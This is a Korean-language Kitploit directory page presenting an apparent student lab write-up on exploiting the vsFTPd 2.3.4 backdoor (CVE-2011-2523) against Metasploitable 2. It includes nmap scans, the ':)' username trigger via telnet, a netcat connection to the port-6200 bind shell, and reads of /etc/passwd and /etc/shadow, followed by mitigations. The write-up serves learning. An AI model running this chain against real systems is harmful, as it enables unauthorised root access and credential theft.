Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
metasploitable2-vsftpd-exploitation — 프로젝트: vsFTPd 2.3.4 백도어 익스플로잇 (CVE-2011-2523) (Metasploitable 2에서) | Kitploit
도구/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
Password CrackingPrivilege EscalationReconnaissanceNetwork MappingPort ScanningVulnerability AnalysisExploitationPost-ExploitationPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

프로젝트: vsFTPd 2.3.4 백도어 익스플로잇 (CVE-2011-2523) (Metasploitable 2에서)

저장소 보기
4개월 전아직 검토되지 않음

Metasploitable 2 - vsFTPd 2.3.4 익스플로잇 실습

개요

이 프로젝트는 의도적으로 취약하게 구성된 머신 Metasploitable 2를 대상으로 하는 침투 테스트 워크플로우를 시연합니다. 목표는 FTP 서비스의 알려진 취약점을 식별, 익스플로잇, 분석하여 궁극적으로 루트 수준 접근을 획득하고 보안 영향을 평가하는 것이었습니다.


실습 환경 구성

  • 공격자 머신: Ubuntu (가상 머신)
  • 대상 머신: Metasploitable 2 (가상 머신)
  • 네트워크 구성: 호스트 전용 네트워크 (192.168.56.0/24)

대상 확인

대상 시스템 및 네트워크 구성을 확인했습니다:

root@kitploit:~
whoami
hostname
ifconfig

대상 설정 확인


연결 확인

공격자와 대상 간 네트워크 연결을 확인했습니다:

root@kitploit:~
ping 192.168.56.101

핑 연결 확인


목표

  • 네트워크 정찰 수행
  • 노출된 서비스 식별
  • 취약한 소프트웨어 탐지
  • 알려진 백도어 취약점 익스플로잇
  • 루트 접근 권한 획득
  • 사후 익스플로잇 분석 수행

사용된 도구

  • Nmap
  • Telnet
  • Netcat
  • Linux (Ubuntu VM)

공격 흐름 요약

  1. 대상 구성 및 연결 확인
  2. 로컬 네트워크에서 대상 호스트 발견
  3. 열린 포트 및 노출된 서비스 식별
  4. 취약한 FTP 서비스 탐지 (vsFTPd 2.3.4)
  5. 조작된 FTP 로그인을 통해 백도어 트리거
  6. 바인드 셸을 통해 루트 접근 권한 획득
  7. 사후 익스플로잇 열거 수행

정찰

호스트 발견을 수행했습니다:

root@kitploit:~
nmap -sn 192.168.56.0/24

네트워크에서 활성 호스트를 식별했습니다.

호스트 발견 스캔


포트 스캐닝

root@kitploit:~
nmap 192.168.56.101

다음을 포함한 여러 열린 포트를 발견했습니다:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

포트 스캔 결과


서비스 열거

root@kitploit:~
nmap -sV 192.168.56.101

실행 중인 FTP 서비스를 식별했습니다:

root@kitploit:~
vsFTPd 2.3.4

전체 서비스 및 스크립트 기반 스캔 결과는 지원 파일인 Nmap 스캔 출력에 포함되어 있습니다.

서비스 열거


취약점 식별

FTP 서비스가 알려진 취약 버전을 실행 중이었습니다:

vsFTPd 2.3.4

이 버전의 vsFTPd는 인증 중 :)를 포함한 사용자 이름이 사용되면 트리거되는 악성 백도어와 함께 배포되었습니다. 활성화되면 서비스는 포트 6200에 바인드 셸을 열어 허가되지 않은 원격 접근을 허용합니다.


익스플로잇 (수동)

Telnet을 사용하여 백도어를 트리거했습니다:

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Telnet을 통한 백도어 트리거


셸 접근

Netcat을 사용하여 백도어에 연결했습니다:

root@kitploit:~
nc 192.168.56.101 6200

바인드 셸 연결


결과

root@kitploit:~
whoami
root@kitploit:~
root

루트 접근 권한을 성공적으로 획득했습니다

루트 접근 증명


사후 익스플로잇

루트 접근 권한 획득 후 기본 시스템 열거를 수행했습니다:

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • 시스템 사용자 및 서비스 계정 열거
  • /etc/shadow에서 해시된 자격 증명 검색
  • 민감한 시스템 파일에 대한 접근 시연

사용자 열거

Shadow 파일 접근


영향

  • 전체 시스템 침해 (루트 수준 접근)
  • 임의 명령 실행 능력
  • 민감한 자격 증명 데이터 노출
  • 네트워크 내 측면 이동 가능성

완화 방안

  • 필요하지 않은 경우 FTP 서비스 제거 또는 비활성화
  • 취약한 소프트웨어를 안전한 버전으로 업데이트
  • 안전하지 않은 프로토콜(암호화되지 않은 FTP)을 안전한 대안(SFTP)으로 교체
  • 방화벽 규칙을 통해 중요한 서비스에 대한 접근 제한
  • 로깅 및 모니터링 구현
  • 강력한 인증 정책 시행

지원 파일

  • Nmap 스캔 출력

주요 시사점

이 실습은 단일 취약 서비스가 어떻게 전체 시스템 침해로 이어질 수 있는지 보여줍니다. 이는 적절한 서비스 구성, 패치 관리, 노출된 공격 표면 최소화의 중요성을 강조합니다.

배운 점

이번이 실제 백도어를 수동으로 익스플로잇한 첫 경험이었습니다. 단일 악성 사용자 이름 문자열(:))이 어떻게 루트 수준 접근을 트리거할 수 있는지 배웠으며, 이는 정찰 단계에서 서비스 열거와 버전 탐지가 왜 중요한지 더욱 깊이 깨닫게 해주었습니다. 또한 /etc/shadow를 읽고 해시된 자격 증명이 실제로 어떻게 생겼는지 이해하는 등 기본적인 Linux 사후 익스플로잇 명령어에 더 익숙해졌습니다.

한계

이는 의도적으로 취약하게 구성된 머신인 Metasploitable 2를 사용한 통제된 실습 환경이었습니다. vsFTPd 2.3.4 백도어는 2011년의 알려진 CVE(CVE-2011-2523)이므로 현대의 실제 환경을 반영하지 않습니다. 실제 평가에서는 회피, 로깅 우회, 피보팅과 같은 추가 단계가 필요할 것입니다. 이 프로젝트는 완전한 침투 테스트가 아닌 핵심 익스플로잇 메커니즘 이해에 초점을 맞추었습니다.

도구 다운로드